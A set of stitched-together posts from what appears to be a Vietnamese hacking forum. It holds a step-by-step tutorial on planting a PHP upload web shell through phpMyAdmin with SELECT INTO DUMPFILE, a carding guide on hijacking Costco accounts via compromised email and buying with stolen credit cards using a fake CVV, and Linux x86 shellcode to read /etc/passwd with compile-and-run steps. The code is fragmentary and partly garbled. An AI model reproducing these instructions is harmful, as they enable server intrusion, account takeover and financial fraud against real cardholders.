[Tut] Upshell PhpMyAdmin

Vì là newbie nên chưa có tut gì đóng góp cho diễn đan. Hôm nay mạo muội post tut upshell via phpmyadmin. Có gì khiếm khuyết mong các ACE trong rum bỏ quá cho.

Bước 1: Tìm Path của document root

+ Vào link
Ví dụ:

+ Vào Php infor() để xem path document root : C:/xampp/htdocs 

Bước 2: Loggin và cơ sở dữ liệu: 


Bước 3: Tạo Database mới

Ví dụ: VHB_Group.

Sử dụng query:

Hoặc như hình minh họa dưới:
Bước 4: Tạo table mới

+) Trong database VHB_Group vừa tạo, tạo table mới, đặt tên là soleil, sử dụng query sau:

CREATE TABLE soleil (contentshell varchar(10000) not null)      

Bước 5: Chèn code shell

+) Chèn code shell upload vào table Soleil vừa được tạo, sử dụng query sau:

INSERT INTO soleil VALUES ('<?php
if ($HTTP_POST_VARS[\'submit\'])
if (!is_uploaded_file($HTTP_POST_FILES[\'file\'][\'tmp_name\']))
$error = "You did not upload a file!";
// assign error message, remove uploaded file, redisplay form.
//A file was uploaded
if ($HTTP_POST_FILES[\'file\'][\'size\'] > $maxfilesize)
$error = "File is too large.";
// assign error message, remove uploaded file, redisplay form.
//File has passed all validation, copy it to the final destination and remove the temporary file:
print "File has been successfully uploaded!";

<form action="<?=$PHP_SELF?>" method="post" enctype="multipart/form-data">
Choose a file to upload:<br>
<input type="file" name="file"><br>
<input type="submit" name="submit" value="submit">

Bước 6: Export file php 

Sử dụng querry:
SELECT * INTO DUMPFILE 'path/upload.php' from table_name;

Path: là path của document root.
Ví dụ:
SELECT * INTO DUMPFILE ' C:/xampp/htdocs /upload.php' from soleil;

Bước 7: Chạy Shell

Run shell theo đường link: http://domain/upload.php
Ví dụ:

Sử dụng shell upload.php chúng ta có thể upload bất kỳ shell nào:

[CCN] Nước hoa các loại...

Site :

Sock = state
ship về địa chỉ nhà của mình bên hồng kông nhé 
oder đến Security code thì ko cần điền gì nhé

Electronics+Clothing+Fragrance ĐỦ Loại linh tinh khác

1> direct
CCV inter

bill = ship 

sock từa lưa
mail hotmail
time us

Tùy từng mặt hàng sẽ ship inter
2> drop
bill= ship or # ship
sock us

Nếu có vấn đề về SOCK xin liên hệ Admin
[TUT] Ship to VN
nguyên liệu :
- check mail pass tìm account shipped costco (vào mail find key word costco)
tìm thấy mail có order shipped, nếu pass ko phải account costco thì chờ khoảng 7h tối us(tùy bạn cảm thấy lúc nào chủ thẻ ko login là được) vào trang costco mà change pass,sau khi change pass xóa ngay cái mail change,ta sẽ có account,sau đó vào account change cái mail của nó
thành mail của mình .(rồi để đó sang hôm sau làm)
- sau khi làm bước trên vào giờ làm việc các bạn vào trang của nó chọn 1 món
hàng cần ship ,đến phần checkout login acc ,change shipping add(nhưng đừng chọn nút save add ),sang trang checkout acc có sẵn cc nhưng ko có ccv
chúng ta điền 000 vào và revi
State US: -còn nếu place ko thành công các bạn tìm con cc trùng sta với add account
.change bill add và card (nhưng đừng save).lúc này nên chọn những cc visa fsa,fcu tiền nhiều,dễ charged
# khi order thành công sẽ có 1 mail báo nhận được order ngay
# khoảng 2-3h sau có 1 mail order sent fulfillment
#tùy vào món hàng bạn mua mà thời gian shipped khác nhau,khi order món hàng nó có ghi thời gian shipped là bao nhiêu ngày(nikon,canon 7d 3-5 ngày laptop shipped hơi lâu 10-15 ngày)
State US: một account có thể ship thỏa mái,khi nào cc hết tiền thì thôi

tại sao phải càn account shipped đơn giản vì chúng ta có
membership number ,có cái này rất dễ ped
,chủ thẻ ko bất ngờ khi bank stament có chử costco.

hack Local (it can bypass chmod 400)

Chúng ta dùng shell code

Linux/x86 file reader.

65 bytes + pathname
Author: certaindeath

Source code:
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
jmp two

pop %ebx

movb $5, %al
xor %ecx, %ecx
int $0x80

mov %eax, %esi
jmp read

movb $1, %al
xor %ebx, %ebx
int $0x80

mov %esi, %ebx
movb $3, %al
sub $1, %esp
lea (%esp), %ecx
movb $1, %dl
int $0x80

xor %ebx, %ebx
cmp %eax, %ebx
je exit

movb $4, %al
movb $1, %bl
movb $1, %dl
int $0x80

add $1, %esp
jmp read

call one
.string "file_name"
char main[]=
"/etc/passwd"; //Put here the file path, default is /etc/passwd

Shellcode này giúp chúng ta view đc file bất kì khi sử dụng và thay đổi path /etc/passwd thành path cần view thôi.
Cách thực hiện.
Save dưới dạng file exploit.c
Sau đó compile lại bằng lệnh 
gcc -o exploit exploit.c

Trông như get root vậy
Sau đó sẽ xuất hiện file exploit
Nâng file đấy lên thành 777.Dùng lệnh
Chmod +x exploit

Và cuối cùng là 

Kết quả là ta đọc đc file /etc/passwd
Rất giống getroot phải ko 
Cách thực hiện rất dễ.

Nhiều server cấm lệnh gcc thì bạn có thể dùng file gcc ở 1 server linux nào đó.Máy ảo chẳng hạn.Up lên rồi chmod 777 rồi ./gcc để thực hiện lệnh....

Ngoài ra các bạn có thể làm tắt server bằng file exploit sau đây.